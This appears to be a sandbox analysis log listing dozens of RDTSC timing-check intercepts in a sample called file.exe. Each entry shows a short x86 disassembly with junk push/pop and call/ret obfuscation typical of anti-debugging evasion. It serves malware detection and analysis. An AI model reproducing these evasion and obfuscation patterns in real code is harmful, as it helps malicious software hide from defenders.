Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C11C second address: F4C161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB958FCD446h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jmp 00007FB958FCD451h 0x00000014 jmp 00007FB958FCD456h 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e jnc 00007FB958FCD458h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C161 second address: F4C165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C165 second address: F4C169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C169 second address: F4C18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 and ecx, dword ptr [ebp+122D3B80h] 0x0000000d lea ebx, dword ptr [ebp+1244DD30h] 0x00000013 sbb esi, 33167D00h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d js 00007FB958B07016h 0x00000023 pop edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34EE3 second address: F34EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34EE9 second address: F34EEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34EEE second address: F34EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B56C second address: F6B572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B572 second address: F6B576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B576 second address: F6B57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B6EE second address: F6B6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B9B1 second address: F6B9B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B9B5 second address: F6B9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958FCD453h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B9CE second address: F6B9D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6BF9E second address: F6BFB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FB958FCD452h 0x0000000c ja 00007FB958FCD446h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6BFB2 second address: F6BFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6BFB6 second address: F6BFC2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB958FCD44Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C3CA second address: F6C3DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C589 second address: F6C58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C6C9 second address: F6C6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C6CD second address: F6C6E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD456h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C6E7 second address: F6C6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FB958B07016h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C6F5 second address: F6C6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C6F9 second address: F6C702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6CDB3 second address: F6CDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FB958FCD446h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6CDC6 second address: F6CDF0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB958B07016h 0x00000008 jne 00007FB958B07016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB958B07024h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6D09D second address: F6D0A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6D0A1 second address: F6D0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B07026h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jc 00007FB958B07039h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6D37C second address: F6D384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6D384 second address: F6D389 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6D389 second address: F6D392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6D392 second address: F6D396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6EBDA second address: F6EBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 jmp 00007FB958FCD44Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6EBEE second address: F6EBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6EBF3 second address: F6EC04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FB958FCD446h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D509 second address: F3D516 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB958B07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D516 second address: F3D53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB958FCD44Fh 0x0000000d popad 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop ecx 0x00000012 popad 0x00000013 jc 00007FB958FCD45Ah 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70CF6 second address: F70CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70CFB second address: F70D08 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB958FCD448h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F70D08 second address: F70D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB958B07016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F75203 second address: F75213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F75213 second address: F7522B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7522B second address: F7524E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jno 00007FB958FCD452h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7524E second address: F75257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F75257 second address: F7525B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F79DEA second address: F79E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB958B07016h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FB958B07022h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F79E0B second address: F79E12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F79208 second address: F79241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB958B07016h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 je 00007FB958B07016h 0x00000016 jmp 00007FB958B07022h 0x0000001b jmp 00007FB958B07020h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F79241 second address: F79275 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007FB958FCD448h 0x00000010 pushad 0x00000011 popad 0x00000012 jnl 00007FB958FCD458h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FB958FCD450h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F793E5 second address: F793EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7957E second address: F79584 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F79584 second address: F79594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FB958B07016h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F79594 second address: F7959C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7959C second address: F795A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F799DE second address: F799F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB958FCD44Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F799F1 second address: F799FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB958B07016h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7BC89 second address: F7BCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB958FCD44Dh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB958FCD456h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7C359 second address: F7C374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 sub esi, 1C88D3DAh 0x0000000e mov si, ax 0x00000011 nop 0x00000012 jnc 00007FB958B0701Eh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7C57D second address: F7C583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7C6CE second address: F7C6D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7CE5E second address: F7CE81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB958FCD457h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EA77 second address: F7EA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7E12A second address: F7E130 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EA7B second address: F7EA81 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EA81 second address: F7EB0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D338Dh], esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FB958FCD448h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FB958FCD448h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a call 00007FB958FCD451h 0x0000004f mov di, 1347h 0x00000053 pop esi 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FB958FCD456h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F815BB second address: F815C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB958B07016h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F82177 second address: F8217B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8217B second address: F82197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F82197 second address: F821B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F821B0 second address: F821B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F423C7 second address: F423CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F423CB second address: F423D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F423D8 second address: F423F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958FCD454h 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F87840 second address: F87844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8AFDE second address: F8AFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F87F0C second address: F87F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F88E5D second address: F88E78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8C02F second address: F8C088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B0701Bh 0x00000009 popad 0x0000000a nop 0x0000000b jg 00007FB958B0701Fh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB958B07018h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov di, 7A58h 0x00000031 cmc 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D2A39h], eax 0x0000003a stc 0x0000003b push eax 0x0000003c pushad 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F88E78 second address: F88E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8C088 second address: F8C097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FB958B07016h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F89E93 second address: F89F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 jmp 00007FB958FCD451h 0x0000000c nop 0x0000000d jno 00007FB958FCD450h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a pushad 0x0000001b jno 00007FB958FCD44Ch 0x00000021 jnp 00007FB958FCD446h 0x00000027 popad 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007FB958FCD448h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 push ecx 0x0000004a push eax 0x0000004b pushad 0x0000004c popad 0x0000004d pop ebx 0x0000004e pop edi 0x0000004f or di, D9D5h 0x00000054 mov eax, dword ptr [ebp+122D041Dh] 0x0000005a jmp 00007FB958FCD44Ah 0x0000005f push FFFFFFFFh 0x00000061 jmp 00007FB958FCD44Dh 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 jnp 00007FB958FCD448h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F89F31 second address: F89F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8E05A second address: F8E060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F89F37 second address: F89F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8E060 second address: F8E065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8C1CA second address: F8C1D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8D2A2 second address: F8D2A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F89F3B second address: F89F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8E065 second address: F8E104 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FB958FCD44Eh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FB958FCD448h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c and edi, dword ptr [ebp+122D3B40h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FB958FCD448h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e add dword ptr [ebp+1244FBB3h], esi 0x00000054 mov ebx, dword ptr [ebp+122D2B19h] 0x0000005a xchg eax, esi 0x0000005b jg 00007FB958FCD45Eh 0x00000061 push eax 0x00000062 pushad 0x00000063 js 00007FB958FCD44Ch 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
